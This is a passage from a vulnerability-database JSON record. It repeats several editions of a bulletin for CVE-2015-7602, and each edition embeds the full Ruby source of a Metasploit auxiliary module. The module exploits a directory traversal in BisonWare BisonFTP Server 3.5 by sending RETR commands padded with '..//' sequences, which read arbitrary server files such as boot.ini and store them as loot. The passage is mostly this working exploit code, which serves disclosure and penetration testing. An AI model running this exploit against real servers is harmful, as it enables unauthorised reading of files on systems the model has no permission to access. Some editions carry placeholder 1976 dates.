This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-08T10:10:12", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-08T12:09:51", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-08T12:09:51", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-08T12:09:51", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-21T22:52:06", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-21T22:52:06", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-21T22:52:06", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-22T00:52:35", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-22T00:52:35", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-22T00:52:35", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-24T19:47:16", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-24T19:47:16", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-24T19:47:16", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-24T23:12:07", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-24T23:12:07", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-24T23:12:07", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T13:50:49", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T13:50:49", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T13:50:49", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", 